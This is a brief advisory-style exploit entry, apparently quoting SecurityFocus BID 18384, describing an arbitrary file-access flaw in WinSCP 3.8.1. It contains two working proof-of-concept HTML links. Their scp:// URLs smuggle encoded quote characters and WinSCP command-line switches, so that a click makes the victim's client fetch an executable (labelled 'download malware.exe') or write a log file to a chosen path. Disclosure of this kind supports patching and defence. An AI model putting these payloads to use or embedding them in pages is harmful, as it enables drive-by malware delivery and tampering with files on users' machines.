No description provided by source.
source: http://www.securityfocus.com/bid/18384/info WinSCP is prone to an arbitrary file-access vulnerability. An attacker can exploit this issue to upload arbitrary files to a victim user's computer or to download arbitrary files from the victim's computer in the context of the vulnerable application. This issue affects version 3.8.1; earlier versions may also be vulnerable. <a href="scp://user:firstname.lastname@example.org:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a> <a href="scp://email@example.com:22/%22%20%22/log=c:%5csomefile%22"log</a>